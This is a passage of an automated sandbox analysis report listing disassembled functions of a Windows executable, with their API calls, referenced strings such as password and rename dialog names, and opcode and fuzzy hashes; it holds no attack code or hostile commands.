SetDlgItemTextW.USER32(?,00000067,?), ref: 0035B304

Strings

GETPASSWORD1, xrefs: 0035B289
xz9, xrefs: 0035B2E2

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xz9
API String ID: 445417207-1291799539
Opcode ID: f770705874c645b39c31c92ddc58153618f80f8bad7c0229ba3ee66d3132e663
Instruction ID: 58935e0924d393ed261bb43a0a8d64e9265e86f02e8ca0b856b44a65516c3afa
Opcode Fuzzy Hash: f770705874c645b39c31c92ddc58153618f80f8bad7c0229ba3ee66d3132e663
Instruction Fuzzy Hash: F411A136900118BADB239E649C4AFFEB76CEB1A711F004420FE45B65A0C7A5AA499771

Function 0035B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0035B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0035B712
DeleteObject.GDI32(00000000), ref: 0035B744
DeleteObject.GDI32(00000000), ref: 0035B767

Part of subcall function 0035A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0035B73D,00000066), ref: 0035A6D5
Part of subcall function 0035A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0035B73D,00000066), ref: 0035A6EC
Part of subcall function 0035A6C2: LoadResource.KERNEL32(00000000,?,?,?,0035B73D,00000066), ref: 0035A703
Part of subcall function 0035A6C2: LockResource.KERNEL32(00000000,?,?,?,0035B73D,00000066), ref: 0035A712
Part of subcall function 0035A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0035B73D,00000066), ref: 0035A72D
Part of subcall function 0035A6C2: GlobalLock.KERNEL32(00000000), ref: 0035A73E
Part of subcall function 0035A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0035A762
Part of subcall function 0035A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0035A7A7
Part of subcall function 0035A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0035A7C6
Part of subcall function 0035A6C2: GlobalFree.KERNEL32(00000000), ref: 0035A7CD

Strings

], xrefs: 0035B71A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: a727efa828777f4a957657beb602ed172981ab344669cd2d88579d375c2a2f67
Instruction ID: 14d5d04d683a92f6d0f5000426715eb8f975cd258b547e14161f3133b1e319ae
Opcode Fuzzy Hash: a727efa828777f4a957657beb602ed172981ab344669cd2d88579d375c2a2f67
Instruction Fuzzy Hash: 3201AD36540A05A7C713A7749C0AE6FBABDAFC5B53F0A0110BD40AB2A1DB218D0D66A1

Function 0035D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00341316: GetDlgItem.USER32(00000000,00003021), ref: 0034135A
Part of subcall function 00341316: SetWindowTextW.USER32(00000000,003735F4), ref: 00341370

EndDialog.USER32(?,00000001), ref: 0035D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0035D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 0035D675
SetDlgItemTextW.USER32(?,00000068), ref: 0035D684

Strings

RENAMEDLG, xrefs: 0035D618

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 3abc236ca757efeca12108f20edff7b0f8bffee12374f7899585d722dcc35a7e
Instruction ID: 1d688e2a37c085bb5b32ac61e1452945f039e49c567b6d431d3ade3cfdafaaf5
Opcode Fuzzy Hash: 3abc236ca757efeca12108f20edff7b0f8bffee12374f7899585d722dcc35a7e
Instruction Fuzzy Hash: F701D833284214BED2339F649D09F5B779DEB5AB03F524411FB05A60E0C7A2990ACB75

Function 00367E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00367E24,00000000,?,00367DC4,00000000,0037C300,0000000C,00367F1B,00000000,00000002), ref: 00367E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00367EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00367E24,00000000,?,00367DC4,00000000,0037C300,0000000C,00367F1B,00000000,00000002), ref: 00367EC9

Strings

CorExitProcess, xrefs: 00367E9E
mscoree.dll, xrefs: 00367E8C

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 5f54afbe112870a9996baf6f289b48782b48892bc9fd3405f4854d2d17b90864
Instruction ID: 01d67e90bf277e1e09917178dec80ea188b17149bca0594b6f0f15a80a600c16
Opcode Fuzzy Hash: 5f54afbe112870a9996baf6f289b48782b48892bc9fd3405f4854d2d17b90864
Instruction Fuzzy Hash: B8F06D31500208BBCB239F65DC09BDEBFB8EF44715F418099F80992150DB359E84DA50

Function 0034F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0035081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00350836
Part of subcall function 0035081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0034F2D8,Crypt32.dll,00000000,0034F35C,?,?,0034F33E,?,?,?), ref: 00350858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0034F2E4
GetProcAddress.KERNEL32(003881C8,CryptUnprotectMemory), ref: 0034F2F4

Strings

CryptUnprotectMemory, xrefs: 0034F2EA
CryptProtectMemory, xrefs: 0034F2DE
Crypt32.dll, xrefs: 0034F2CE

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: b8d276d6ecc4ad3aa14f5c309dab5ed807536a86524f5c58188bdf572dfc5875
Instruction ID: 06f88c988453cf859ef560e0b0ce16fa898f7c600a80564fcdd42e7fa423803f
Opcode Fuzzy Hash: b8d276d6ecc4ad3aa14f5c309dab5ed807536a86524f5c58188bdf572dfc5875
Instruction Fuzzy Hash: BFE086749107519EC7739F34D84EB417BD86F04700F18C82DF0DE97650D6B9E5809B51

Function 00362BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00362CA1
___AdjustPointer.LIBCMT ref: 00362CC4
_abort.LIBCMT ref: 00362D12
___AdjustPointer.LIBCMT ref: 00362D60

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: fe11a9cba5e1e48dd09a2a2ed4b4f4e0ffc8540c63aae8d8ccb1dc7fac31de7f
Instruction ID: b6c3abd30863bf8113728238c42c4cd622bab60de8f590bb31dad67cb768f4c5
Opcode Fuzzy Hash: fe11a9cba5e1e48dd09a2a2ed4b4f4e0ffc8540c63aae8d8ccb1dc7fac31de7f
Instruction Fuzzy Hash: 28510571600A12AFDB2B8F14D849BAB77A4FF54310F26C52DEC164BAA9E731ED40D790

Function 0036BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0036BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0036BF5C

Part of subcall function 00368E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036CA2C,00000000,?,00366CBE,?,00000008,?,003691E0,?,?,?), ref: 00368E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0036BF82
_free.LIBCMT ref: 0036BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0036BFA4

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: d6363ac32661953b290db068f18ae24aff615b12854b33bcf71bb639eb63f227
Instruction ID: 75f1fd3a2aeac2d18179423f73b0e7d111b5a7ecbf1e5444faedd0356d8668ff
Opcode Fuzzy Hash: d6363ac32661953b290db068f18ae24aff615b12854b33bcf71bb639eb63f227
Instruction Fuzzy Hash: AE01D4726012117FA3233A765C8CC7BAB6DDEC6BA03158129F908CA119EF618D41DDB0

Function 00369869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,003691AD,0036B188,?,00369813,00000001,00000364,?,00363F73,00000050,?,00381030,00000200), ref: 0036986E
_free.LIBCMT ref: 003698A3
_free.LIBCMT ref: 003698CA
SetLastError.KERNEL32(00000000,?,00381030,00000200), ref: 003698D7
SetLastError.KERNEL32(00000000,?,00381030,00000200), ref: 003698E0

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 05425808c62464291f75628381ee8f07d824156518d28f8812da13c96515ed2e
Instruction ID: 6e976604838b53ea28f914fe5804cb9db6b98d36010ed276d979dcf64c3e6260
Opcode Fuzzy Hash: 05425808c62464291f75628381ee8f07d824156518d28f8812da13c96515ed2e
Instruction Fuzzy Hash: 45012836144605ABC3232374AD85B6B256DDFD3770B22C136F519A719EEE718C066631

Function 00350EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 003511CF: ResetEvent.KERNEL32(?), ref: 003511E1
Part of subcall function 003511CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 003511F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00350F21
CloseHandle.KERNEL32(?,?), ref: 00350F3B
DeleteCriticalSection.KERNEL32(?), ref: 00350F54
CloseHandle.KERNEL32(?), ref: 00350F60
CloseHandle.KERNEL32(?), ref: 00350F6C

Part of subcall function 00350FE4: WaitForSingleObject.KERNEL32(?,000000FF,00351206,?), ref: 00350FEA
Part of subcall function 00350FE4: GetLastError.KERNEL32(?), ref: 00350FF6

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: a6c92145fb8048c23ca5030215232080268bb5cf505d893f40bfc27332a3327c
Instruction ID: dee0977bda23b970127536bf19d2ca2bfe16debdc8c0bf36a37d88857dd24a57
Opcode Fuzzy Hash: a6c92145fb8048c23ca5030215232080268bb5cf505d893f40bfc27332a3327c
Instruction Fuzzy Hash: D1015E72100B44EFC7339B64DC85FCABBADFB08711F000929F66B92160CB767A84DA50

Function 0036C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0036C817

Part of subcall function 00368DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0036C896,?,00000000,?,00000000,?,0036C8BD,?,00000007,?,?,0036CCBA,?), ref: 00368DE2
Part of subcall function 00368DCC: GetLastError.KERNEL32(?,?,0036C896,?,00000000,?,00000000,?,0036C8BD,?,00000007,?,?,0036CCBA,?,?), ref: 00368DF4

_free.LIBCMT ref: 0036C829
_free.LIBCMT ref: 0036C83B
_free.LIBCMT ref: 0036C84D
_free.LIBCMT ref: 0036C85F

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e73ac91482a74f207470155edb6ec7e692a0a7a863c73e18ce7e5801c7ea5629
Instruction ID: 209450ee8260e50540ca985f1f623f4c344a7783da915b221ce23e08deec03f7
Opcode Fuzzy Hash: e73ac91482a74f207470155edb6ec7e692a0a7a863c73e18ce7e5801c7ea5629
Instruction Fuzzy Hash: 23F06232510200ABC633DB69E4C5C2673EDAA08714B55AC59F148DB95ACB70FC80CA64

Function 00351FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00351FE5
_wcslen.LIBCMT ref: 00351FF6
_wcslen.LIBCMT ref: 00352006
_wcslen.LIBCMT ref: 00352014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0034B371,?,?,00000000,?,?,?), ref: 0035202F

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 863ffc75a28b1ee76d90fb325720b8048bb0a717e0e044fe8fbeef435b7d3052
Instruction ID: 5789557a2cd2ad767a4b5daf188e0c5d62a84cd168308227b103de360185d41b
Opcode Fuzzy Hash: 863ffc75a28b1ee76d90fb325720b8048bb0a717e0e044fe8fbeef435b7d3052
Instruction Fuzzy Hash: 7FF01733008014BBCF276F51EC09D8ABF26EB45761B21C415FA1A5F0A1CB7296A5DAA0

Function 003515FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 003517BC
_swprintf.LIBCMT ref: 0035186B

Strings

%s: %s, xrefs: 003517CB
%ls, xrefs: 00351641, 00351657

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: bbc3835c9ea77580e36e27c3fdb47182a3bc0ad8378d5e500e58f5606064035e
Instruction ID: e5f7a171c762187258c649d867222d09170230ce312c96df0e9887b60d142d36
Opcode Fuzzy Hash: bbc3835c9ea77580e36e27c3fdb47182a3bc0ad8378d5e500e58f5606064035e
Instruction Fuzzy Hash: 1451FE36288300F6F63316948D46F36B26DAB09B07F154506FFDA6C8F1C6A2B45CA75A

Function 00367F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\0V2JsCrGUB.exe,00000104), ref: 00367FAE
_free.LIBCMT ref: 00368079
_free.LIBCMT ref: 00368083

Strings

C:\Users\user\Desktop\0V2JsCrGUB.exe, xrefs: 00367FA5, 00367FAC, 00367FDB, 00368013

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\0V2JsCrGUB.exe
API String ID: 2506810119-3972481871
Opcode ID: 9c93ee964b98e97572102a88368599972c0001faf5683d6a8828de3e8c35e07b
Instruction ID: 4eb85ee846cb67f7983e648d15de1f28bdfa9cace049b221888ecd31b746f9ed
Opcode Fuzzy Hash: 9c93ee964b98e97572102a88368599972c0001faf5683d6a8828de3e8c35e07b
Instruction Fuzzy Hash: 7D31A671A00218BFDB23DF99D884D9EBBBCEF89310F118666F4049B215DBB18E44CB61

Function 003631D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 003631FB
_abort.LIBCMT ref: 00363306

Strings

MOC, xrefs: 0036320D
RCC, xrefs: 00363215

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: b292700707a4ba7ada7c5544fdf6e48f64d71f29dace8a2af4f80516b9b874dc
Instruction ID: 793e03463088f730544be6ee0e97f9b7c089f585692e707dd1399294f480df91
Opcode Fuzzy Hash: b292700707a4ba7ada7c5544fdf6e48f64d71f29dace8a2af4f80516b9b874dc
Instruction Fuzzy Hash: F0417A71900209AFCF16DF98CC81AEEBBB5FF48304F198459F904AB26AD735EA50DB50

Function 00347401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00347406

Part of subcall function 00343BBA: __EH_prolog.LIBCMT ref: 00343BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 003474CD

Part of subcall function 00347A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00347AAB
Part of subcall function 00347A9C: GetLastError.KERNEL32 ref: 00347AF1
Part of subcall function 00347A9C: CloseHandle.KERNEL32(?), ref: 00347B00

Strings

SeSecurityPrivilege, xrefs: 0034744B
SeRestorePrivilege, xrefs: 00347460

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: df970ad5ae264a23a95cec82c18a7b3357df0dc60429a3f25853563a7c9d8876
Instruction ID: e481ee7736e8b87b45a2d15c7441dfd7f252f7cc0bec3e81ddecca58ecb1c32e
Opcode Fuzzy Hash: df970ad5ae264a23a95cec82c18a7b3357df0dc60429a3f25853563a7c9d8876
Instruction Fuzzy Hash: A63163B1D042586ADF23EFA4DC45FEEBBEDAF06304F044055F845AF292D774AA488B61

Function 0035AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00341316: GetDlgItem.USER32(00000000,00003021), ref: 0034135A
Part of subcall function 00341316: SetWindowTextW.USER32(00000000,003735F4), ref: 00341370

EndDialog.USER32(?,00000001), ref: 0035AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0035ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0035ADC2

Strings

